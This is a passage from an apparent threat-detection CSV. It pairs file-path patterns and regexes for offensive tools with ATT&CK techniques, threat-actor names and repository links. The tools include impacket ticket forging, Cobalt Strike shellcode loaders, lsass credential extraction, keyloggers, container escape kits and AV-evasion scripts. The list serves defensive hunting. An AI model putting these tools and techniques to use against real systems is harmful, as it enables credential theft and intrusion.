TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","11910" "*/ticketConverter.py*",".{0,1000}\/ticketConverter\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","11911" "*/ticketConverter.py*",".{0,1000}\/ticketConverter\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11912" "*/ticketer.exe*",".{0,1000}\/ticketer\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11913" "*/ticketer.py -*",".{0,1000}\/ticketer\.py\s\-.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","#linux","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","11914" "*/ticketer.py*",".{0,1000}\/ticketer\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#linux","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","11915" "*/ticketer.py*",".{0,1000}\/ticketer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11916" "*/ticketer.py*",".{0,1000}\/ticketer\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","11917" "*/ticketsplease.py*",".{0,1000}\/ticketsplease\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","11918" "*/TikiLoader/*",".{0,1000}\/TikiLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","11920" "*/TikiSpawn.*",".{0,1000}\/TikiSpawn\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. 
Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","11921" "*/TikiSpawn/*",".{0,1000}\/TikiSpawn\/.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. 
writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","11922" "*/TimeException.exe*",".{0,1000}\/TimeException\.exe.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV 
real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","1","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","11923" "*/TimeException.git*",".{0,1000}\/TimeException\.git.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","1","N/A","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","11924" "*/timeoutpwn64*",".{0,1000}\/timeoutpwn64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","11925" "*/timestomp.py*",".{0,1000}\/timestomp\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","11926" "*/timestomping.ps1*",".{0,1000}\/timestomping\.ps1.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","11927" "*/timwr/CVE-2016-5195*",".{0,1000}\/timwr\/CVE\-2016\-5195.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","11928" "*/tinar.py*",".{0,1000}\/tinar\.py.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","#linux","N/A","9","10","64","17","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z","11929" "*/tinymet.exe*",".{0,1000}\/tinymet\.exe.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD 
EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","1","N/A","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","11930" "*/tls-alpn.nse*",".{0,1000}\/tls\-alpn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11932" "*/tls-nextprotoneg.nse*",".{0,1000}\/tls\-nextprotoneg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11933" "*/tls-ticketbleed.nse*",".{0,1000}\/tls\-ticketbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11934" "*/tmmmp *",".{0,1000}\/tmmmp\s.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","#linux","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","11939" "*/tmp/ sgn -i /tmp/*",".{0,1000}\/tmp\/\ssgn\s\-i\s\/tmp\/.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#linux","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","11940" "*/tmp/*-passwords.txt*",".{0,1000}\/tmp\/.{0,1000}\-passwords\.txt.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","#linux","N/A","N/A","10","6048","726","2025-04-15T13:13:19Z","2021-01-01T19:02:36Z","11944" "*/tmp/*-usernames.txt*",".{0,1000}\/tmp\/.{0,1000}\-usernames\.txt.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 -
TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","0","#linux","N/A","N/A","10","6048","726","2025-04-15T13:13:19Z","2021-01-01T19:02:36Z","11945" "*/tmp/.llock*",".{0,1000}\/tmp\/\.llock.{0,1000}","offensive_tool_keyword","NoodleRAT","AV signature of noodlerat malware","T1059.004 - T1078 - T1105 - T1100 - T1547.006","TA0003 - TA0005 - TA0010 - TA0011","N/A","N/A","Malware","https://www.trendmicro.com/en_us/research/24/f/noodle-rat-reviewing-the-new-backdoor-used-by-chinese-speaking-g.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","11946" "*/tmp/.manspider*",".{0,1000}\/tmp\/\.manspider.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","#linux","N/A","8","10","1117","138","2024-07-18T06:14:04Z","2020-03-18T13:27:20Z","11948" "*/tmp/amass.zip*",".{0,1000}\/tmp\/amass\.zip.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11949" "*/tmp/angel_bc *",".{0,1000}\/tmp\/angel_bc\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11950" "*/tmp/auto-priv-cgroup*",".{0,1000}\/tmp\/auto\-priv\-cgroup.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - 
T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","11951" "*/tmp/auto-priv-mountdir*",".{0,1000}\/tmp\/auto\-priv\-mountdir.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","11952" "*/tmp/auto-shimpwn*",".{0,1000}\/tmp\/auto\-shimpwn.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","11953" "*/tmp/beacon_x64.bin*",".{0,1000}\/tmp\/beacon_x64\.bin.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#linux","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","11954" "*/tmp/bin/csprecon*",".{0,1000}\/tmp\/bin\/csprecon.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11955" "*/tmp/bin/subfinder*",".{0,1000}\/tmp\/bin\/subfinder.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11956" "*/tmp/blackarch*",".{0,1000}\/tmp\/blackarch.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - path used by a script preparation of blackarch OS","T1204.002","TA0002","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","0","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","11957" "*/tmp/borg_d3monized*",".{0,1000}\/tmp\/borg_d3monized.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","11958" "*/tmp/c2-rebind.so*",".{0,1000}\/tmp\/c2\-rebind\.so.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","#linux","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","11960" "*/tmp/chimera.ps1*",".{0,1000}\/tmp\/chimera\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","#linux","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","11961" "*/tmp/credentials.txt*",".{0,1000}\/tmp\/credentials\.txt.{0,1000}","offensive_tool_keyword","lsassy","Extract 
credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#linux","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","11962" "*/tmp/cryptomining*",".{0,1000}\/tmp\/cryptomining.{0,1000}","offensive_tool_keyword","cryptomining","A Linux cryptomining malware","T1496","TA0009","N/A","N/A","Cryptomining","https://github.com/tarcisio-marinho/cryptomining","1","0","#linux","N/A","7","1","36","15","2023-05-05T02:42:59Z","2018-04-07T03:59:52Z","11963" "*/tmp/dcow *",".{0,1000}\/tmp\/dcow\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/timwr/CVE-2016-5195","1","0","#linux","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","11964" "*/tmp/empire*",".{0,1000}\/tmp\/empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 -
Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#linux","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","11966" "*/tmp/evil.sh*",".{0,1000}\/tmp\/evil\.sh.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#linux","N/A","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","11967" "*/tmp/exploit*",".{0,1000}\/tmp\/exploit.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","11968" "*/tmp/FavFreak/*",".{0,1000}\/tmp\/FavFreak\/.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","11969" 